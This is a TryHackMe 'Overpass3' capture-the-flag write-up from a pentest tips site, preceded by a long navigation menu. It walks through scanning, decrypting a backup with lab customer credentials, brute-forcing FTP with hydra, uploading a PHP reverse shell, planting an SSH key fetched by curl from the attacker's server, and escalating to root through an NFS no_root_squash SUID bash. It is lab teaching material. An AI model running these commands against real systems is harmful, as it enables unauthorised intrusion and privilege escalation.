CSbyGB - Pentips
Buy me a tea
  • CS By GB - PenTips
    • Welcome to CSbyGB's Pentips
  • Networking, Protocols and Network pentest
    • Basics
    • DNS
    • FTP
    • HTTP & HTTPS
    • IMAP
    • IPMI
    • MSSQL
    • MYSQL
    • NFS
    • Oracle TNS
    • POP3
    • RDP
    • RPC
    • Rservices
    • Rsync
    • SMB
    • SMTP
    • SNMP
    • SSH
    • VOIP and related protocols
    • Winrm
    • WMI
    • Useful tips when you find unknown ports
  • Ethical Hacking - General Methodology
    • Introduction
    • Information Gathering
    • Scanning & Enumeration
    • Exploitation (basics)
    • Password Attacks
    • Post Exploitation
    • Lateral Movement
    • Proof-of-Concept
    • Post-Engagement
    • MITRE ATT&CK
  • External Pentest
    • External Pentest
  • Web Pentesting
    • Introduction to HTTP and web
    • Enumeration
    • OWASP Top 10
    • General Methodo & Misc Tips
    • Web Services and API
    • Vunerabilities and attacks
      • Clickjacking
      • CORS (Misconfigurations)
      • CSRF
      • SSRF
      • Bypass captcha
      • Template Injection (client and server side)
      • MFA bypass
      • XXE
    • Exposed git folder
    • Docker exploitation and Docker vulnerabilities
    • Websockets
  • Mobile App Pentest
    • Android
    • IOS
  • Wireless Pentest
    • Wireless pentest
  • Cloud Pentest
    • Cloud Pentest
    • Google Cloud Platform
    • AWS
  • Thick Client Pentest
    • Thick Client
  • Hardware Pentest
    • ATM
    • IoT
  • Secure Code Review
    • Secure code review
    • Java notes for Secure Code Review
  • AI & AI Pentest
    • MITRE ATLAS
    • OWASP ML and LLM
    • Hugging face
    • AI Python
    • Gemini
    • Ollama
  • Checklist
    • Web Application and API Pentest Checklist
    • Linux Privesc Checklist
    • Mobile App Pentest Checklist
  • Tools
    • Burpsuite
    • Android Studio
    • Frida
    • CrackMapExec
    • Netcat and alternatives
    • Nmap
    • Nuclei
    • Evil Winrm
    • Metasploit
    • Covenant
    • Mimikatz
    • Passwords, Hashes and wordlist tools
    • WFuzz
    • WPScan
    • Powershell Empire
    • Curl
    • Vulnerability Scanning tools
    • Payload Tools
    • Out of band Servers
    • STEWS
    • Webcrawlers
    • Websocat
  • VM and Labs
    • General tips
    • Setup your pentest lab
  • Linux
    • Initial Foothold
    • Useful commands and tools for pentest on Linux
    • Privilege Escalation
      • Kernel Exploits
      • Password and file permission
      • Sudo
      • SUID
      • Capabilities
      • Scheduled tasks
      • NFS Root Squashing
      • Services
      • PATH Abuse
      • Wildcard Abuse
      • Privileged groups
      • Exploit codes Cheat Sheet
  • Windows
    • Offensive windows
    • Enumeration and general Win tips
    • Privilege Escalation
    • Active Directory
    • Attacking Active Directory
      • LLMNR Poisoning
      • SMB Relay Attacks
      • Shell Access
      • IPv6 Attacks
      • Passback Attacks
      • Abusing ZeroLogon
    • Post-Compromise Enumeration
      • Powerview or SharpView (.NET equivalent)
      • AD Manual Enumeration
      • Bloodhound
      • Post Compromise Enumeration - Resources
    • Post Compromise Attacks
      • Pass the Password / Hash
      • Token Impersonation - Potato attacks
      • Kerberos
      • GPP/cPassword Attacks
      • URL File Attack
      • PrintNightmare
      • Printer Bug
      • AutoLogon exploitation
      • Always Installed Elevated exploitation
      • UAC Bypass
      • Abusing ACL
      • Unconstrained Delegation
    • Persistence
    • AV Evasion
    • Weaponization
    • Useful commands in Powershell, CMD and Sysinternals
    • Windows Internals
  • Programming
    • Python programming
    • My scripts
    • Kotlin
  • Binary Exploitation
    • Assembly
    • Buffer Overflow - Stack based - Winx86
    • Buffer Overflow - Stack based - Linux x86
  • OSINT
    • OSINT
    • Create an OSINT lab
    • Sock Puppets
    • Search engines
    • OSINT Images
    • OSINT Email
    • OSINT Password
    • OSINT Usernames
    • OSINT People
    • OSINT Social Media
    • OSINT Websites
    • OSINT Business
    • OSINT Wireless
    • OSINT Tools
    • Write an OSINT report
  • Pentester hardware toolbox
    • Flipper Zero
    • OMG cables
    • Rubber ducky
  • Post Exploitation
    • File transfers between target and attacking machine
    • Maintaining Access
    • Pivoting
    • Cleaning up
  • Reporting
    • How to report your findings
  • Red Team
    • Red Team
    • Defenses Enumeration
    • AV Evasion
  • Writeups
    • Hackthebox Tracks
      • Hackthebox - Introduction to Android Exploitation - Track
    • Hackthebox Writeups
      • Hackthebox - Academy
      • Hackthebox - Access
      • Hackthebox - Active
      • Hackthebox - Ambassador
      • Hackthebox - Arctic
      • Hackthebox - Awkward
      • Hackthebox - Backend
      • Hackthebox - BackendTwo
      • Hackthebox - Bastard
      • Hackthebox - Bastion
      • Hackthebox - Chatterbox
      • Hackthebox - Devel
      • Hackthebox - Driver
      • Hackthebox - Explore
      • Hackthebox - Forest
      • Hackthebox - Good games
      • Hackthebox - Grandpa
      • Hackthebox - Granny
      • Hackthebox - Inject
      • Hackthebox - Jeeves
      • Hackthebox - Jerry
      • Hackthebox - Lame
      • Hackthebox - Late
      • Hackthebox - Love
      • Hackthebox - Mentor
      • Hackthebox - MetaTwo
      • Hackthebox - Monteverde
      • Hackthebox - Nibbles
      • Hackthebox - Optimum
      • Hackthebox - Paper
      • Hackthebox - Photobomb
      • Hackthebox - Poison
      • Hackthebox - Precious
      • Hackthebox - Querier
      • Hackthebox - Resolute
      • Hackthebox - RouterSpace
      • Hackthebox - Sauna
      • Hackthebox - SecNotes
      • Hackthebox - Shoppy
      • Hackthebox - Soccer
      • Hackthebox - Steamcloud
      • Hackthebox - Toolbox
      • Hackthebox - Vault
      • Hackthebox - Updown
    • TryHackme Writeups
      • TryHackMe - Anonymous
      • TryHackMe - Blaster
      • TryHackMe - CMesS
      • TryHackMe - ConvertMyVideo
      • TryHackMe - Corridor
      • TryHackMe - LazyAdmin
      • TryHackMe - Looking Glass
      • TryHackMe - Nahamstore
      • TryHackMe - Overpass3
      • TryHackMe - OWASP Top 10 2021
      • TryHackMe - SimpleCTF
      • TryHackMe - SQL Injection Lab
      • TryHackMe - Sudo Security Bypass
      • TryHackMe - Tomghost
      • TryHackMe - Ultratech
      • TryHackMe - Vulnversity
      • TryHackMe - Wonderland
    • Vulnmachines Writeups
      • Web Labs Basic
      • Web Labs Intermediate
      • Cloud Labs
    • Mobile Hacking Lab
      • Mobile Hacking Lab - Lab - Config Editor
      • Mobile Hacking Lab - Lab - Strings
    • Portswigger Web Security Academy Writeups
      • PS - DomXSS
      • PS - Exploiting vulnerabilities in LLM APIs
    • OWASP projects and challenges writeups
      • OWASP MAS Crackmes
    • Vulnerable APIs
      • Vampi
      • Damn Vulnerable Web Service
      • Damn Vulnerable RESTaurant
    • Various Platforms
      • flAWS 1&2
  • Digital skills
    • How to make a gitbook
    • Marp
    • Linux Tips
    • Docker
    • VSCodium
    • Git Tips
    • Obsidian
  • Durable skills
    • Durable skills wheel/Roue des compétences durables
  • Projects
    • Projects
      • Technical Projects
      • General Projects
  • Talks
    • My Talks about Web Pentest
    • My talks about Android Application hacking
    • Other of my talks and Podcast
  • Resources
    • A list of random resources
Powered by GitBook
On this page
  • Nmap
  • Gobuster
  • Decrypt the xlsx
  • FTP
  1. Writeups
  2. TryHackme Writeups

TryHackMe - Overpass3

PreviousTryHackMe - NahamstoreNextTryHackMe - OWASP Top 10 2021

Last updated 3 years ago

Nmap

┌──(root💀kali)-[~]
└─# nmap -T4 -sC -sV -O -Pn -p- 10.10.4.129
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-30 17:50 EDT
Stats: 0:04:38 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 93.32% done; ETC: 17:55 (0:00:20 remaining)
Nmap scan report for 10.10.4.129
Host is up (0.21s latency).
Not shown: 65235 filtered tcp ports (no-response), 297 filtered tcp ports (admin-prohibited)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   3072 de:5b:0e:b5:40:aa:43:4d:2a:83:31:14:20:77:9c:a1 (RSA)
|   256 f4:b5:a6:60:f4:d1:bf:e2:85:2e:2e:7e:5f:4c:ce:38 (ECDSA)
|_  256 29:e6:61:09:ed:8a:88:2b:55:74:f2:b7:33:ae:df:c8 (ED25519)
80/tcp open  http    Apache httpd 2.4.37 ((centos))
|_http-title: Overpass Hosting
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (92%), Crestron XPanel control system (90%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.16 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), Linux 5.4 (86%), Linux 2.6.32 (86%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Unix

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 317.52 seconds

Gobuster

If we go to the website there is nothing specific that is visible so we can run a gobuster to check for hidden directories

┌──(root💀kali)-[~]
└─# gobuster dir -u http://10.10.4.129/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.4.129/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/03/30 17:54:11 Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd            (Status: 403) [Size: 218]
/.htaccess            (Status: 403) [Size: 218]
/backups              (Status: 301) [Size: 235] [--> http://10.10.4.129/backups/]
/cgi-bin/             (Status: 403) [Size: 217]

There is a backups page, in there we can find a backup.zip file. The zip is easily extracted (not password protected). In it we find:

  • A PGP private key

  • An excel file CUstomerDetails.xlsx.gpg

Decrypt the xlsx

  • And then we can decrypt the file:

┌──(root💀kali)-[~/Documents/tryhackme/overpass3/backup]
└─# gpg --output CustomerDetails.xlsx --decrypt CustomerDetails.xlsx.gpg
  • Once decrypted the file can be opened with libre office (if you do not have Microsoft Excel like me ;) )

  • And we get this

Customer Name	Username	Password	Credit card number	CVC
Par. A. Doxx	paradox	ShibesAreGreat123	4111 1111 4555 1142	432
0day Montgomery	0day	OllieIsTheBestDog	5555 3412 4444 1115	642
Muir Land	muirlandoracle	A11D0gsAreAw3s0me	5103 2219 1119 9245	737

So we have usernames and passwords:

  • paradox ShibesAreGreat123

  • 0day OllieIsTheBestDog

  • muirlandoracle A11D0gsAreAw3s0me

We can put them both in separate files for later use

FTP

  • Let's see if we can use those to connect through ftp. (note: I tried with ssh but password authentication is not supported)

  • Using hydra we have a hit!

┌──(root💀kali)-[~/Documents/tryhackme/overpass3]
└─# hydra -L users -P pass 10.10.4.129 -t 4 ftp                                                                                                                                                          255 ⨯
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-03-30 18:17:40
[DATA] max 4 tasks per 1 server, overall 4 tasks, 9 login tries (l:3/p:3), ~3 tries per task
[DATA] attacking ftp://10.10.4.129:21/
[21][ftp] host: 10.10.4.129   login: paradox   password: ShibesAreGreat123
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-03-30 18:17:48
  • So we can connext to the ftp using the creds paradox:ShibesAreGreat123

  • It seems like this the ftp used to serve the website. We have write permission so we can try to get rce this way.

  • We modify the IP address and port as we wish

  • we set up our listener rlwrap nc -lvp 1234 (rlwrap will allow us to have a more interactive shell which is pretty convenient)

  • We put ou reverse shell on the ftp

ftp> put php-reverse-shell.php
local: php-reverse-shell.php remote: php-reverse-shell.php
200 EPRT command successful. Consider using EPSV.
150 Ok to send data.
100% |******************************************************************************************************************************************************************|  5493       11.19 MiB/s    00:00 ETA
226 Transfer complete.
5493 bytes sent in 00:00 (8.73 KiB/s)
  • And now we can navigate to our shell using our browser http://10.10.4.129/php-reverse-shell.php

  • We get a shell!!

whoami
apache
sh-4.4$ 
  • Let's use the command find to find a flag find / -name *flag* 2>/dev/null There is one here: /usr/share/httpd/web.flag

  • We have the web flag

  • We could try the passwords we got previously with the su command

  • Let's try with james we get failure with all three pass. Lets try with paradox, it works with the password ShibesAreGreat123

  • If we ls -al the home directory we have an authorized key for paradox so we could replace it with our public key to have a more stable shell. Lets generate an rsa_key

┌──(root💀kali)-[~/Documents/tryhackme/overpass3]
└─# ssh-keygen                                                                                                                                                                                             1 ⨯
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /root/Documents/tryhackme/overpass3/private
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/Documents/tryhackme/overpass3/private
Your public key has been saved in /root/Documents/tryhackme/overpass3/private.pub
The key fingerprint is:
SHA256:dpZvvEmhvr7eAEjEaGtCxsvxUKzvQ0waY0fTMmAZTLE root@kali
The key's randomart image is:
+---[RSA 3072]----+
| +*B.+.          |
| .O.O.o          |
| +EO =.          |
|  O *. .   .     |
| . @  . S + .    |
|  . +  . + + .   |
|   o      o =    |
|    o    . = o   |
|     .   o*o+    |
+----[SHA256]-----+
  • Now we just need to replace the authorized_keys fil with our public key. First we copy our private key in an authorized_keys file cp private.pub authorized_keys

  • Then we laucn an http server python3 -m http.server 80

  • wget does not work in our target so we can use curl instead curl http://10.13.22.56/authorized_keys --output authorized_keys

  • And now the authorized keys is our public key

  • Now we can just connect this way ssh -i private paradox@10.10.4.129

  • We get linpeas in our machine wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas_linux_amd64

  • We launch python http server python3 -m http.server 80

  • We get it in our target using curl curl http://10.13.22.56/linpeas_linux_amd64 --output linpeas

  • We make it executable chmod +x linpeas

  • we launch it ./linpeas

  • There is a recent CVE cve-2021-4034

  • But there is also this that seems interesting as linpeas highlight as a 95% PE vector

╔══════════╣ Analyzing NFS Exports Files (limit 70)
-rw-r--r--. 1 root root 54 Nov 18  2020 /etc/exports                                                                                                                                                           
/home/james *(rw,fsid=0,sync,no_root_squash,insecure)
  • We are not able to mount the share so we need to check the how is nfs running:

[paradox@ip-10-10-4-129 ~]$ rpcinfo -p | grep nfs
    100003    3   tcp   2049  nfs
    100003    4   tcp   2049  nfs
    100227    3   tcp   2049  nfs_acl
  • we could try to port forward ssh paradox@10.10.4.129 -i private -L 2049:localhost:2049 and then mount the share

┌──(root💀kali)-[~/Documents/tryhackme/overpass3]
└─# mkdir nfs                                                                                                                                                                                              1 ⨯
                                                                                                                                                                                                               
┌──(root💀kali)-[~/Documents/tryhackme/overpass3]
└─# mount -v -t nfs localhost:/ nfs
mount.nfs: timeout set for Wed Mar 30 19:29:51 2022
mount.nfs: trying text-based options 'vers=4.2,addr=::1,clientaddr=::1'
  • We now have access to the user flag and we also have the .ssh folder of james so we can use it to login as james

┌──(root💀kali)-[~/…/tryhackme/overpass3/nfs/.ssh]
└─# ssh -i id_rsa james@10.10.4.129 
  • It works

  • Let's try to go further with the nfs misconfiguration

  • For our attacking machine we run

cp /bin/bash nfs
chmod +s bash
  • From our shell as jams we can now run

./bash -p
/home/james/bash: /lib64/libtinfo.so.6: no version information available (required by /home/james/bash)
/home/james/bash: /lib64/libc.so.6: version `GLIBC_2.33' not found (required by /home/james/bash)
  • So we get this error we probably need another bash binary let's try with the one from the target machine.

  • We copy it using scp to our attacking machine scp -i .ssh/id_rsa james@10.10.4.129:/bin/bash .

  • Let's redo our chomd +s chmod +s bash

  • We just need to ./bash -p and it works!

bash-4.4# whoami
root

(in fact I accidentally type ./bash at first but then retyping ./bash -p did the trick.

  • we can get the root flag bash-4.4# cat /root/root.flag

According to it can be decrypted in one command but first we need to import the private key with pgp --import priv.key

As it is apache we can try to use a php reverse shell. Lets take the one from

Let's get on the machine to enumerate our way to root.

Let's have a look at

Room
this doc
pentestmonkey
linpeas
this documentation from hacktricks